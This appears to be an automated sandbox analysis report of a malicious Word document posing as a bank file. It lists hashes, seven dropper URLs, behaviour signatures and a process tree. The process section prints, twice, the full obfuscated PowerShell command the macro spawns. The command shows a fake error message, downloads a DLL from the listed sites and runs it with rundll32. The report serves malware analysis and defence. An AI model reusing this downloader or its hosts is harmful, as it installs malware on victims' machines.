Analysis

  • max time kernel
    69s
  • max time network
    46s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    13-01-2021 11:30

General

  • Target

    Bank_2020_12_9663193478.doc

  • Size

    159KB

  • MD5

    a62fc9507760d45349a9ce1af9700962

  • SHA1

    263b72ee6f86c510e0b8a949acc0dd426b79b316

  • SHA256

    6b2addd77d4961da71636553bd57f3b73bf65aebc867a3a3f0508dd58d89174e

  • SHA512

    e03ef2398d786db29afe7f075a84f3cf28095495faf4de86011a04fcaadf61b677097d686a20fdbaa9294343f2ad69ebb27489d014c95725226436958e91d554

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://familylifetruth.com/cgi-bin/PPq7/

exe.dropper

https://coshou.com/wp-admin/EM/

exe.dropper

https://www.todoensaludips.com/wp-includes/9/

exe.dropper

https://dieuhoaxanh.vn/wp-admin/a/

exe.dropper

http://cahyaproperty.bbtbatam.com/mhD/

exe.dropper

http://depannage-vehicule-maroc.com/wp-admin/c/

exe.dropper

https://techworldo.com/cgi-bin/gcZ/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Bank_2020_12_9663193478.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:748
  • C:\Windows\system32\cmd.exe
    cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD UwBFAFQALQBWAGEAcgBJAEEAQgBsAGUAIAAgADgAaQBoADUANgA3ACAAIAAoACAAIABbAHQAWQBwAGUAXQAoACIAewAzAH0AewAwAH0AewA0AH0AewAyAH0AewAxAH0AIgAtAGYAJwBZAHMAVAAnACwAJwBSAGUAYwBUAE8AUgB5ACcALAAnAE0ALgBpAE8ALgBEAEkAJwAsACcAcwAnACwAJwBlACcAKQApADsAIAAgACAAUwBFAFQALQBJAHQAZQBtACAAKAAiAHYAQQAiACsAIgBSAGkAQQAiACsAIgBiAEwAZQA6AFIAIgArACIAaQAiACsAIgA3AHgATwAzACIAKQAgACgAWwBUAHkAUABlAF0AKAAiAHsAMgB9AHsANQB9AHsANAB9AHsAMwB9AHsAMQB9AHsAMAB9ACIALQBGACAAJwBSACcALAAnAE0AYQBOAGEARwBFACcALAAnAFMAJwAsACcAVgBJAGMARQBQAG8ASQBuAHQAJwAsACcALgBuAGUAVAAuAHMARQByACcALAAnAFkAcwB0AGUAbQAnACkAIAApACAAIAA7ACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACgAJwBTAGkAJwArACgAJwBsAGUAbgAnACsAJwB0ACcAKQArACgAJwBsACcAKwAnAHkAQwBvAG4AdAAnACkAKwAnAGkAJwArACgAJwBuACcAKwAnAHUAZQAnACkAKQA7ACQASAAwAHcAYwBmAG4AYwA9ACQAUAA1ADgAQgAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAWgAxADkAUgA7ACQAQgA1ADMATgA9ACgAKAAnAFMAJwArACcANwA3ACcAKQArACcASAAnACkAOwAgACAAKAAgACAAbABzACAAIABWAGEAcgBJAGEAQgBMAEUAOgA4AGkAaAA1ADYANwAgACAAKQAuAFYAYQBsAHUAZQA6ADoAIgBDAFIARQBBAHQAYABFAGAARABgAGkAUgBlAGMAVABPAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAZQBOADcAUgByACcAKwAnADEAcwAnACsAJwBqADkAYQAnACsAJwBlAE4AJwApACsAJwA3ACcAKwAoACcAQgAnACsAJwBjAHgAJwApACsAKAAnADQAaQAnACsAJwBhAHkAZQAnACkAKwAnAE4ANwAnACkALgAiAHIAZQBQAGAATABhAGAAYwBFACIAKAAoAFsAQwBIAGEAUgBdADEAMAAxACsAWwBDAEgAYQBSAF0ANwA4ACsAWwBDAEgAYQBSAF0ANQA1ACkALABbAHMAVAByAGkAbgBHAF0AWwBDAEgAYQBSAF0AOQAyACkAKQApADsAJABWADUANwBSAD0AKAAoACcAQgAnACsAJwA0ADYAJwApACsAJwBWACcAKQA7ACAAKAB2AGEAUgBJAGEAQgBsAGUAIAAoACIAUgAiACsAIgBpACIAKwAiADcAeABPADMAIgApACAAKQAuAFYAQQBsAFUARQA6ADoAIgBTAGUAQwB1AHIASQBgAFQAYAB5AFAAYABSAE8AYABUAG8AQwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFgANAA0AFMAPQAoACcAUwA4ACcAKwAnADEARAAnACkAOwAkAFAAYQAyAG4AdQByADQAIAA9ACAAKAAnAEsAJwArACgAJwBfADkAJwArACcATwAnACkAKQA7ACQATwA2ADYARwA9ACgAKAAnAEYAOAAnACsAJwA4ACcAKQArACcAVwAnACkAOwAkAEMAeQBnADAAawB1ADcAPQAkAEgATwBNAEUAKwAoACgAKAAnAGUAQQB3AFIAJwArACcAcgAnACkAKwAoACcAMQAnACsAJwBzAGoAOQBhAGUAQQAnACkAKwAoACcAdwAnACsAJwBCAGMAeAAnACkAKwAoACcANABpAGEAJwArACcAeQAnACsAJwBlAEEAJwApACsAJwB3ACcAKQAgAC0AcgBlAHAATABBAEMAZQAoACcAZQBBACcAKwAnAHcAJwApACwAWwBjAGgAYQBSAF0AOQAyACkAKwAkAFAAYQAyAG4AdQByADQAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAEUAMAAxAEIAPQAoACcAUgA3ACcAKwAnAF8AUwAnACkAOwAkAE0AcgBrAGoAYwBpAG0APQAoACgAJwBdAGIAJwArACcAMgAnACkAKwAnAFsAcwAnACsAKAAnAHMAOgAvAC8AJwArACcAZgBhAG0AJwApACsAJwBpACcAKwAnAGwAJwArACcAeQAnACsAJwBsAGkAJwArACgAJwBmACcAKwAnAGUAdAAnACkAKwAoACcAcgB1AHQAJwArACcAaAAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKwAnAGMAZwBpAC0AYgAnACkAKwAoACcAaQBuACcAKwAnAC8AUABQAHEANwAvACcAKwAnAEAAXQAnACsAJwBiADIAJwApACsAKAAnAFsAcwBzADoALwAnACsAJwAvACcAKQArACgAJwBjAG8AJwArACcAcwBoACcAKwAnAG8AdQAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB3AHAALQAnACsAJwBhACcAKQArACgAJwBkAG0AJwArACcAaQBuAC8AJwApACsAJwBFAE0AJwArACgAJwAvACcAKwAnAEAAXQAnACkAKwAoACcAYgAnACsAJwAyAFsAcwBzADoAJwArACcALwAnACsAJwAvAHcAdwAnACkAKwAoACcAdwAuACcAKwAnAHQAJwApACsAKAAnAG8AZABvAGUAJwArACcAbgBzACcAKwAnAGEAbAAnACkAKwAoACcAdQAnACsAJwBkAGkAcAAnACkAKwAnAHMAJwArACgAJwAuACcAKwAnAGMAbwBtACcAKQArACcALwAnACsAKAAnAHcAJwArACcAcAAtAGkAJwApACsAJwBuACcAKwAnAGMAJwArACgAJwBsAHUAZAAnACsAJwBlAHMAJwArACcALwA5AC8AQAAnACkAKwAnAF0AYgAnACsAKAAnADIAWwAnACsAJwBzAHMAOgAnACkAKwAoACcALwAnACsAJwAvACcAKwAnAGQAaQBlAHUAJwApACsAKAAnAGgAbwBhACcAKwAnAHgAYQAnACsAJwBuACcAKQArACcAaAAuACcAKwAoACcAdgBuAC8AdwAnACsAJwBwACcAKwAnAC0AYQAnACsAJwBkAG0AJwApACsAJwBpACcAKwAoACcAbgAvAGEAJwArACcALwBAAF0AYgAnACsAJwAyAFsAcwA6ACcAKwAnAC8AJwApACsAJwAvAGMAJwArACcAYQBoACcAKwAoACcAeQBhACcAKwAnAHAAcgAnACkAKwAnAG8AJwArACgAJwBwAGUAJwArACcAcgB0AHkAJwApACsAJwAuACcAKwAnAGIAJwArACgAJwBiACcAKwAnAHQAYgBhACcAKwAnAHQAYQBtACcAKQArACcALgAnACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAKAAnAG0AaABEACcAKwAnAC8AJwApACsAJwBAACcAKwAnAF0AYgAnACsAJwAyACcAKwAnAFsAcwAnACsAJwA6AC8AJwArACcALwBkACcAKwAnAGUAcAAnACsAJwBhACcAKwAoACcAbgBuACcAKwAnAGEAJwApACsAJwBnAGUAJwArACgAJwAtAHYAZQAnACsAJwBoAGkAJwArACcAYwAnACkAKwAnAHUAJwArACcAbAAnACsAJwBlAC0AJwArACgAJwBtAGEAJwArACcAcgBvACcAKQArACgAJwBjAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAKAAnAC8AdwBwACcAKwAnAC0AYQAnACsAJwBkAG0AJwApACsAJwBpACcAKwAnAG4AJwArACgAJwAvAGMALwBAACcAKwAnAF0AJwApACsAKAAnAGIAJwArACcAMgBbAHMAcwA6AC8ALwB0ACcAKQArACcAZQBjACcAKwAnAGgAdwAnACsAJwBvACcAKwAnAHIAJwArACgAJwBsAGQAbwAnACsAJwAuACcAKQArACcAYwBvACcAKwAoACcAbQAvAGMAZwAnACsAJwBpACcAKQArACcALQAnACsAJwBiACcAKwAoACcAaQBuAC8AZwAnACsAJwBjAFoAJwApACsAJwAvACcAKQAuACIAcgBFAFAAbABBAGAAYwBFACIAKAAoACcAXQBiACcAKwAoACcAMgBbACcAKwAnAHMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAUABsAGAASQB0ACIAKAAkAFQAMgA2AEEAIAArACAAJABIADAAdwBjAGYAbgBjACAAKwAgACQAQgA3ADUAUAApADsAJABXADcAMQBUAD0AKAAoACcAUAAnACsAJwA5ADMAJwApACsAJwBYACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARgBzADYAbQBvADUAdwAgAGkAbgAgACQATQByAGsAagBjAGkAbQApAHsAdAByAHkAewAoAC4AKAAnAE4AZQAnACsAJwB3AC0ATwBiAGoAZQBjACcAKwAnAHQAJwApACAAcwBZAHMAdABlAE0ALgBuAGUAdAAuAFcARQBiAEMATABpAEUAbgB0ACkALgAiAEQATwB3AE4ATABvAEEAZABmAGAASQBgAEwAZQAiACgAJABGAHMANgBtAG8ANQB3ACwAIAAkAEMAeQBnADAAawB1ADcAKQA7ACQARwA3ADUAUQA9ACgAJwBXACcAKwAoACcAOAAnACsAJwBfAFIAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAQwB5AGcAMABrAHUANwApAC4AIgBsAGAAZQBuAGcAdABoACIAIAAtAGcAZQAgADMAMAA1ADcANQApACAAewAuACgAJwByACcAKwAnAHUAbgBkAGwAbAAzADIAJwApACAAJABDAHkAZwAwAGsAdQA3ACwAKAAnAEMAbwAnACsAKAAnAG4AdAAnACsAJwByAG8AbABfAFIAdQAnACsAJwBuACcAKQArACgAJwBEACcAKwAnAEwATAAnACkAKQAuACIAVABgAG8AcwBUAHIAYABJAE4ARwAiACgAKQA7ACQAQgAyADkARAA9ACgAJwBaACcAKwAoACcANgAnACsAJwAyAFcAJwApACkAOwBiAHIAZQBhAGsAOwAkAEYAMgA2AEYAPQAoACcAVgAnACsAKAAnADMANwAnACsAJwBXACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABKADEAXwBOAD0AKAAnAFQAMAAnACsAJwA4AEgAJwApAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1340
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:1556
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POwersheLL -w hidden -ENCOD UwBFAFQALQBWAGEAcgBJAEEAQgBsAGUAIAAgADgAaQBoADUANgA3ACAAIAAoACAAIABbAHQAWQBwAGUAXQAoACIAewAzAH0AewAwAH0AewA0AH0AewAyAH0AewAxAH0AIgAtAGYAJwBZAHMAVAAnACwAJwBSAGUAYwBUAE8AUgB5ACcALAAnAE0ALgBpAE8ALgBEAEkAJwAsACcAcwAnACwAJwBlACcAKQApADsAIAAgACAAUwBFAFQALQBJAHQAZQBtACAAKAAiAHYAQQAiACsAIgBSAGkAQQAiACsAIgBiAEwAZQA6AFIAIgArACIAaQAiACsAIgA3AHgATwAzACIAKQAgACgAWwBUAHkAUABlAF0AKAAiAHsAMgB9AHsANQB9AHsANAB9AHsAMwB9AHsAMQB9AHsAMAB9ACIALQBGACAAJwBSACcALAAnAE0AYQBOAGEARwBFACcALAAnAFMAJwAsACcAVgBJAGMARQBQAG8ASQBuAHQAJwAsACcALgBuAGUAVAAuAHMARQByACcALAAnAFkAcwB0AGUAbQAnACkAIAApACAAIAA7ACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACgAJwBTAGkAJwArACgAJwBsAGUAbgAnACsAJwB0ACcAKQArACgAJwBsACcAKwAnAHkAQwBvAG4AdAAnACkAKwAnAGkAJwArACgAJwBuACcAKwAnAHUAZQAnACkAKQA7ACQASAAwAHcAYwBmAG4AYwA9ACQAUAA1ADgAQgAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAWgAxADkAUgA7ACQAQgA1ADMATgA9ACgAKAAnAFMAJwArACcANwA3ACcAKQArACcASAAnACkAOwAgACAAKAAgACAAbABzACAAIABWAGEAcgBJAGEAQgBMAEUAOgA4AGkAaAA1ADYANwAgACAAKQAuAFYAYQBsAHUAZQA6ADoAIgBDAFIARQBBAHQAYABFAGAARABgAGkAUgBlAGMAVABPAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAZQBOADcAUgByACcAKwAnADEAcwAnACsAJwBqADkAYQAnACsAJwBlAE4AJwApACsAJwA3ACcAKwAoACcAQgAnACsAJwBjAHgAJwApACsAKAAnADQAaQAnACsAJwBhAHkAZQAnACkAKwAnAE4ANwAnACkALgAiAHIAZQBQAGAATABhAGAAYwBFACIAKAAoAFsAQwBIAGEAUgBdADEAMAAxACsAWwBDAEgAYQBSAF0ANwA4ACsAWwBDAEgAYQBSAF0ANQA1ACkALABbAHMAVAByAGkAbgBHAF0AWwBDAEgAYQBSAF0AOQAyACkAKQApADsAJABWADUANwBSAD0AKAAoACcAQgAnACsAJwA0ADYAJwApACsAJwBWACcAKQA7ACAAKAB2AGEAUgBJAGEAQgBsAGUAIAAoACIAUgAiACsAIgBpACIAKwAiADcAeABPADMAIgApACAAKQAuAFYAQQBsAFUARQA6ADoAIgBTAGUAQwB1AHIASQBgAFQAYAB5AFAAYABSAE8AYABUAG8AQwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFgANAA0AFMAPQAoACcAUwA4ACcAKwAnADEARAAnACkAOwAkAFAAYQAyAG4AdQByADQAIAA9ACAAKAAnAEsAJwArACgAJwBfADkAJwArACcATwAnACkAKQA7ACQATwA2ADYARwA9ACgAKAAnAEYAOAAnACsAJwA4ACcAKQArACcAVwAnACkAOwAkAEMAeQBnADAAawB1ADcAPQAkAEgATwBNAEUAKwAoACgAKAAnAGUAQQB3AFIAJwArACcAcgAnACkAKwAoACcAMQAnACsAJwBzAGoAOQBhAGUAQQAnACkAKwAoACcAdwAnACsAJwBCAGMAeAAnACkAKwAoACcANABpAGEAJwArACcAeQAnACsAJwBlAEEAJwApACsAJwB3ACcAKQAgAC0AcgBlAHAATABBAEMAZQAoACcAZQBBACcAKwAnAHcAJwApACwAWwBjAGgAYQBSAF0AOQAyACkAKwAkAFAAYQAyAG4AdQByADQAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAEUAMAAxAEIAPQAoACcAUgA3ACcAKwAnAF8AUwAnACkAOwAkAE0AcgBrAGoAYwBpAG0APQAoACgAJwBdAGIAJwArACcAMgAnACkAKwAnAFsAcwAnACsAKAAnAHMAOgAvAC8AJwArACcAZgBhAG0AJwApACsAJwBpACcAKwAnAGwAJwArACcAeQAnACsAJwBsAGkAJwArACgAJwBmACcAKwAnAGUAdAAnACkAKwAoACcAcgB1AHQAJwArACcAaAAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKwAnAGMAZwBpAC0AYgAnACkAKwAoACcAaQBuACcAKwAnAC8AUABQAHEANwAvACcAKwAnAEAAXQAnACsAJwBiADIAJwApACsAKAAnAFsAcwBzADoALwAnACsAJwAvACcAKQArACgAJwBjAG8AJwArACcAcwBoACcAKwAnAG8AdQAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB3AHAALQAnACsAJwBhACcAKQArACgAJwBkAG0AJwArACcAaQBuAC8AJwApACsAJwBFAE0AJwArACgAJwAvACcAKwAnAEAAXQAnACkAKwAoACcAYgAnACsAJwAyAFsAcwBzADoAJwArACcALwAnACsAJwAvAHcAdwAnACkAKwAoACcAdwAuACcAKwAnAHQAJwApACsAKAAnAG8AZABvAGUAJwArACcAbgBzACcAKwAnAGEAbAAnACkAKwAoACcAdQAnACsAJwBkAGkAcAAnACkAKwAnAHMAJwArACgAJwAuACcAKwAnAGMAbwBtACcAKQArACcALwAnACsAKAAnAHcAJwArACcAcAAtAGkAJwApACsAJwBuACcAKwAnAGMAJwArACgAJwBsAHUAZAAnACsAJwBlAHMAJwArACcALwA5AC8AQAAnACkAKwAnAF0AYgAnACsAKAAnADIAWwAnACsAJwBzAHMAOgAnACkAKwAoACcALwAnACsAJwAvACcAKwAnAGQAaQBlAHUAJwApACsAKAAnAGgAbwBhACcAKwAnAHgAYQAnACsAJwBuACcAKQArACcAaAAuACcAKwAoACcAdgBuAC8AdwAnACsAJwBwACcAKwAnAC0AYQAnACsAJwBkAG0AJwApACsAJwBpACcAKwAoACcAbgAvAGEAJwArACcALwBAAF0AYgAnACsAJwAyAFsAcwA6ACcAKwAnAC8AJwApACsAJwAvAGMAJwArACcAYQBoACcAKwAoACcAeQBhACcAKwAnAHAAcgAnACkAKwAnAG8AJwArACgAJwBwAGUAJwArACcAcgB0AHkAJwApACsAJwAuACcAKwAnAGIAJwArACgAJwBiACcAKwAnAHQAYgBhACcAKwAnAHQAYQBtACcAKQArACcALgAnACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAKAAnAG0AaABEACcAKwAnAC8AJwApACsAJwBAACcAKwAnAF0AYgAnACsAJwAyACcAKwAnAFsAcwAnACsAJwA6AC8AJwArACcALwBkACcAKwAnAGUAcAAnACsAJwBhACcAKwAoACcAbgBuACcAKwAnAGEAJwApACsAJwBnAGUAJwArACgAJwAtAHYAZQAnACsAJwBoAGkAJwArACcAYwAnACkAKwAnAHUAJwArACcAbAAnACsAJwBlAC0AJwArACgAJwBtAGEAJwArACcAcgBvACcAKQArACgAJwBjAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAKAAnAC8AdwBwACcAKwAnAC0AYQAnACsAJwBkAG0AJwApACsAJwBpACcAKwAnAG4AJwArACgAJwAvAGMALwBAACcAKwAnAF0AJwApACsAKAAnAGIAJwArACcAMgBbAHMAcwA6AC8ALwB0ACcAKQArACcAZQBjACcAKwAnAGgAdwAnACsAJwBvACcAKwAnAHIAJwArACgAJwBsAGQAbwAnACsAJwAuACcAKQArACcAYwBvACcAKwAoACcAbQAvAGMAZwAnACsAJwBpACcAKQArACcALQAnACsAJwBiACcAKwAoACcAaQBuAC8AZwAnACsAJwBjAFoAJwApACsAJwAvACcAKQAuACIAcgBFAFAAbABBAGAAYwBFACIAKAAoACcAXQBiACcAKwAoACcAMgBbACcAKwAnAHMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAUABsAGAASQB0ACIAKAAkAFQAMgA2AEEAIAArACAAJABIADAAdwBjAGYAbgBjACAAKwAgACQAQgA3ADUAUAApADsAJABXADcAMQBUAD0AKAAoACcAUAAnACsAJwA5ADMAJwApACsAJwBYACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARgBzADYAbQBvADUAdwAgAGkAbgAgACQATQByAGsAagBjAGkAbQApAHsAdAByAHkAewAoAC4AKAAnAE4AZQAnACsAJwB3AC0ATwBiAGoAZQBjACcAKwAnAHQAJwApACAAcwBZAHMAdABlAE0ALgBuAGUAdAAuAFcARQBiAEMATABpAEUAbgB0ACkALgAiAEQATwB3AE4ATABvAEEAZABmAGAASQBgAEwAZQAiACgAJABGAHMANgBtAG8ANQB3ACwAIAAkAEMAeQBnADAAawB1ADcAKQA7ACQARwA3ADUAUQA9ACgAJwBXACcAKwAoACcAOAAnACsAJwBfAFIAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAQwB5AGcAMABrAHUANwApAC4AIgBsAGAAZQBuAGcAdABoACIAIAAtAGcAZQAgADMAMAA1ADcANQApACAAewAuACgAJwByACcAKwAnAHUAbgBkAGwAbAAzADIAJwApACAAJABDAHkAZwAwAGsAdQA3ACwAKAAnAEMAbwAnACsAKAAnAG4AdAAnACsAJwByAG8AbABfAFIAdQAnACsAJwBuACcAKQArACgAJwBEACcAKwAnAEwATAAnACkAKQAuACIAVABgAG8AcwBUAHIAYABJAE4ARwAiACgAKQA7ACQAQgAyADkARAA9ACgAJwBaACcAKwAoACcANgAnACsAJwAyAFcAJwApACkAOwBiAHIAZQBhAGsAOwAkAEYAMgA2AEYAPQAoACcAVgAnACsAKAAnADMANwAnACsAJwBXACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABKADEAXwBOAD0AKAAnAFQAMAAnACsAJwA4AEgAJwApAA==
        2⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:420

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/420-3-0x0000000000000000-mapping.dmp
    • memory/420-4-0x000007FEF53D0000-0x000007FEF5DBC000-memory.dmp
      Filesize

      9.9MB

    • memory/420-5-0x0000000002260000-0x0000000002261000-memory.dmp
      Filesize

      4KB

    • memory/420-6-0x000000001AC00000-0x000000001AC01000-memory.dmp
      Filesize

      4KB

    • memory/420-7-0x00000000023C0000-0x00000000023C1000-memory.dmp
      Filesize

      4KB

    • memory/420-8-0x0000000002480000-0x0000000002481000-memory.dmp
      Filesize

      4KB

    • memory/420-10-0x000000001B760000-0x000000001B761000-memory.dmp
      Filesize

      4KB

    • memory/420-11-0x000000001B540000-0x000000001B541000-memory.dmp
      Filesize

      4KB

    • memory/748-9-0x0000000001EF0000-0x0000000001EF1000-memory.dmp
      Filesize

      4KB

    • memory/1556-2-0x0000000000000000-mapping.dmp